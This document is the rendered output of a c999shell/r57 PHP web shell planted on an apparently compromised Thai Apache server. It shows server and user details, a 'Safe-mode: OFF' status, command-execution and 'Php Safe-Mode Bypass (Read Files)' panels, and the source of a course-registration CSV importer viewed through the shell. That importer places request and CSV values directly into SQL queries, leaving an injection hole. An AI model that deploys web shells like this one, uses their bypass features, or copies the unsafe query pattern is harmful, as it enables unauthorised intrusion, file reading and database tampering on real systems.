Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/reg-tools/ drwxr-xr-x | |
| Viewing file: Select action/file-type: "; if (isset($_FILES['fileUpload'])) { $file = strtolower($_FILES["fileUpload"]["name"]); $type = strrchr($file, "."); if (($type == ".csv")) { $objFopen = fopen($_FILES["fileUpload"]["tmp_name"], 'r'); if ($objFopen) { while (!feof($objFopen)) { $tmp[] = fgetcsv($objFopen); } fclose($objFopen); $sql = "SELECT * FROM rg_Curriculum WHERE curId = '" . $_REQUEST["curSelect"] . "'"; $link->query($sql); $rsCur = $link->getnext(); echo " ***** นำเข้าข้อมูลรายวิชา " . $rsCur->curName . " ****** "; for ($i = 1; $i < count($tmp); $i++) { $sql = "SELECT * FROM rg_CurriculumStructure WHERE csCurId = '" . $_REQUEST["curSelect"] . "' AND csSeq = '" . $tmp[$i][11] . "'"; $link->query($sql); $rsCs = $link->getnext(); $sql = "INSERT INTO rg_Course VALUES ('','" . $tmp[$i][1] . "','" . $tmp[$i][2] . "','" . $tmp[$i][3] . "','" . $tmp[$i][4] . "','','','','','" . $tmp[$i][7] . "','" . $tmp[$i][8] . "','" . $tmp[$i][9] . "','" . $tmp[$i][8] . "','" . $tmp[$i][9] . "','" . $tmp[$i][10] . "','" . $tmp[$i][5] . "','Y','','" . $rsCs->csCdId1 . "','1',now(),'reg-tools',now(),'reg-tools')"; $link->query($sql); $sql = "INSERT INTO rg_ProgramCourses VALUES ('" . $rsCs->csCurId . "','" . $rsCs->csCdId1 . "','" . $rsCs->csCdId2 . "','" . $link->last_insert_id() . "','C','C','Y')"; $link->query($sql); echo " " . $i . ".บันทึกข้อมูลสำเร็จ -> " . $tmp[$i][1] . " " . $tmp[$i][3] . " "; } } } else { echo ' การอัพโหลดไม่สำเร็จ !!! ';
}
}
} else {
?>
กรุณาอัพโหลดไฟล์ CSV เท่านั้น |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0059 ]-- |